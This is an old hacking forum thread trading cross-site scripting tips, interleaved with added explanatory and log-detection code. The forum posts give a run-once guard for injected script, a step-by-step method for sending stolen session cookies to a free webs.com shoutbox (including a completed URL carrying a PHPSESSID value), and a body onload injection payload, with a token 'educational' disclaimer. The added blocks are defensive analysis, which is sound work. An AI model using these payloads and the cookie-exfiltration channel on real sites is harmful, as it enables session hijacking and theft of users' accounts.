Topic: "the "neat XSS tips and tricks" thread" (page 1 of 1)

aceldama
well, i recall writing a few things on xss in topics of various locations over the past couple of years. so, i thought it might be a good idea to start a thread that allows everyone to share tips and tricks of their own. :idea:

basically no rules, but i would recommend that you don't give links to vulnerable pages as a POC.
aceldama
Preventing multiple executions of the injected code

so let me start with one of my old favourites. when a page has an injection vulnerability that gets echoed in more than one place on the same page, you'd oftentimes like to force the injected script to run only once - mainly to stop your site from catching the same data several times. i have found that this can be achieved by using the typeof operator as follows:

if(typeof x=="undefined"){x=1;/* code to be executed */}


though sometimes the quotes are filtered, which makes it a bit more tricky. not to fear, it can be circumvented like so:

if(typeof x==typeof y){x=1;/* code to be executed */}


hope this helps.
Edited by aceldama on 22.01.2010 22:20:40
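The guard above works because `typeof` on an identifier that was never declared evaluates to the string "undefined" instead of throwing, and because assigning to that identifier in a sloppy-mode script then creates a global, so the second and later echoes see it as already set. The harness below is an added example, not code from the thread: it models each echo of the injected script as a separate `new Function()` evaluation (which, like an inline script body, is global-scope and sloppy-mode unless it opts into strict mode), and replaces the "[code to be executed]" part with a counter named `guardRuns`. Both the counter name and the `new Function()` modelling are this example's assumptions.

```javascript
// Added example (not from the thread). Reproduces the run-once guard from the
// post above in a harness so the behaviour can be observed: each "echo" of the
// injected script is modelled as a separate sloppy-mode script via new Function().

// The two guard forms from the post. The only change is that the
// "[code to be executed]" part is replaced by a counter increment so the
// harness can count how many times the guarded block actually ran.
const GUARD_QUOTED   = 'if(typeof x=="undefined"){x=1;globalThis.guardRuns++;}';
const GUARD_UNQUOTED = 'if(typeof x==typeof y){x=1;globalThis.guardRuns++;}';
// Baseline with no guard at all.
const UNGUARDED      = 'globalThis.guardRuns++;';

// Evaluate `snippet` `echoes` times, as if the page echoed it that often.
// Returns how many times the guarded block executed.
function runEchoed(snippet, echoes) {
  delete globalThis.x;        // an implicit global is configurable, so this resets state
  globalThis.guardRuns = 0;
  for (let i = 0; i < echoes; i++) {
    new Function(snippet)();  // global-scope, sloppy-mode evaluation
  }
  return globalThis.guardRuns;
}

// Caveat: the trick relies on sloppy-mode implicit globals. The same snippet
// inside a strict-mode script throws on `x=1` instead of creating `x`.
// Returns "ok" if the snippet ran, otherwise the name of the error thrown.
function runStrict(snippet) {
  delete globalThis.x;
  globalThis.guardRuns = 0;
  try {
    new Function('"use strict";' + snippet)();
    return "ok";
  } catch (e) {
    return e.constructor.name;
  }
}

console.log("quoted guard, 3 echoes:  ", runEchoed(GUARD_QUOTED, 3));   // 1
console.log("unquoted guard, 3 echoes:", runEchoed(GUARD_UNQUOTED, 3)); // 1
console.log("no guard, 3 echoes:      ", runEchoed(UNGUARDED, 3));      // 3
console.log("quoted guard, strict:    ", runStrict(GUARD_QUOTED));      // ReferenceError
```

The strict-mode case is the one worth remembering when reviewing such a snippet: a page whose inline scripts are served with `"use strict"`, or a payload that lands inside a strict-mode function, changes the first assignment from "create a global" to "throw", so the guarded block never runs at all.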
aceldama
Not got your own server? not a problem - using webs [dot] com shout boxes to harvest data

what you will need:
  1. an email account
  2. a webs.com account (they're free)

step1:
create a shoutbox. navigate to: site addons > shoutboxes > Click here to create a new ShoutBox.

step2:
set up the shout box. once set up, have a look at the code for the box. the interesting bits are highlighted in red. jot them down, we'll be needing them later

<script type="text/javascript" src="http://link.members.webs.com/JS/checkLogin.jsp"></script>
<script type="text/javascript" src="hxxp://images.webs.com/JS/fw.js"></script>
<script type="text/javascript" src="hxxp://images.webs.com/JS/fw.shoutbox.js"></script>
<script type="text/javascript" src="hxxp://link.members.webs.com/Members/Comments/loadShoutBoxJS.jsp?shoutBoxOwnerID=[ownerId#]&listID=[listId#]&skinName=light&width=300&height=400"></script>


step3:
now the fun bit. taking the data we collected, edit the following url, filling in the blanks:
hxxp://link.members.webs.com/Members/Comments/postComment.jsp?userID=[ownerId#]&commentSettingID=[listId#]&name=AceldamA&next=callback&callback=

step4:
we're almost ready now. all we need to add are two variables:
  1. rand - a random number to ensure the script refreshes
  2. body - the data we want to log
just append these two to the url get request and we're set. following is an example of a completed url:
hxxp://link.members.webs.com/Members/Comments/postComment.jsp?userID=XXXXX&commentSettingID=XXXXX&name=haxxor&next=callback&callback=&rand=0.8838134699569573&body=PHPSESSID%3D9915ec261f208a63d2ee34d16c914703

step5:
now we just need to check the data. you can do this by visiting the shoutbox. just navigate to the shoutbox you created and there it is!

DISCLAIMER:
i take no responsibility for what you do with your stolen data. this is for educational purposes only. happy hacking - AceldamA
Edited by aceldama on 23.01.2010 01:43:07
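From the defender's side, the channel described in this post is an outbound GET whose query string carries a session cookie, and that is what makes it detectable regardless of which third-party endpoint receives it. The following is an added example, not code from the thread: it scans a few constructed proxy log lines (constructed format: timestamp, client IP, method, full URL) and flags every query parameter whose decoded value looks like a session cookie. The log format, the `parseLine()` helper and the placeholder owner and list ids are this example's assumptions; the endpoint and the PHPSESSID value come from the post.

```javascript
// Added example (not from the thread): detection logic for the exfiltration
// channel described in the post above. The log format is a constructed one
// (timestamp, client IP, method, full URL); adapt parseLine() to your proxy's
// real format.

// Cookie names whose values are session identifiers. The value pattern is
// deliberately loose: PHP, Java and ASP.NET session ids are long alphanumerics.
const SESSION_COOKIE_RE = /\b(PHPSESSID|JSESSIONID|ASP\.NET_SessionId)=([A-Za-z0-9_-]{16,})/i;

// Constructed proxy log lines. The second one reproduces the completed URL from
// the post, with placeholder digits for the owner and list ids. The third is a
// near miss: the cookie name appears in a search query but no "name=value" pair.
const SAMPLE_LOG = [
  "2010-01-23T01:40:10Z 10.0.0.5 GET http://images.webs.com/JS/fw.shoutbox.js",
  "2010-01-23T01:40:12Z 10.0.0.5 GET http://link.members.webs.com/Members/Comments/postComment.jsp?userID=11111&commentSettingID=22222&name=haxxor&next=callback&callback=&rand=0.8838134699569573&body=PHPSESSID%3D9915ec261f208a63d2ee34d16c914703",
  "2010-01-23T01:41:03Z 10.0.0.7 GET http://example.com/search?q=PHPSESSID+timeout",
];

// Split one constructed log line into its four fields.
function parseLine(line) {
  const [ts, client, method, url] = line.trim().split(/\s+/);
  return { ts, client, method, url };
}

// Returns one finding per query parameter that contains a session cookie.
function findCookieExfil(lines) {
  const findings = [];
  for (const line of lines) {
    const rec = parseLine(line);
    let url;
    try { url = new URL(rec.url); } catch { continue; } // skip unparsable lines
    // URLSearchParams percent-decodes values, so "PHPSESSID%3D..." becomes "PHPSESSID=..."
    for (const [param, value] of url.searchParams) {
      const m = SESSION_COOKIE_RE.exec(value);
      if (m) {
        findings.push({ ts: rec.ts, client: rec.client, host: url.hostname,
                        path: url.pathname, param, cookie: m[1] });
      }
    }
  }
  return findings;
}

// Summarise findings per destination host so a busy drop box stands out.
function countByHost(findings) {
  const counts = {};
  for (const f of findings) counts[f.host] = (counts[f.host] || 0) + 1;
  return counts;
}

const findings = findCookieExfil(SAMPLE_LOG);
console.log(JSON.stringify(findings, null, 2));
console.log(countByHost(findings));
```

Matching on the decoded parameter value rather than on the destination host is the point: the post's endpoint is just one of many free comment, form or paste services that can be used this way, and the cookie-shaped value in an outbound query string is the stable indicator. Pair it with an allow list of hosts that legitimately receive your session cookie to keep the alert volume low.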
nachtbarjunge
Just a really easy thing:

If you want to trigger your JavaScript with the onload handler: onload only works with the <frameset> and the <body> tag. You will rarely be able to inject code into the original body tag, but you can inject your own. This could look similar to this:

<body onload="alert('vulnerable');"></body>

Of course, this only works if not too much is filtered out.
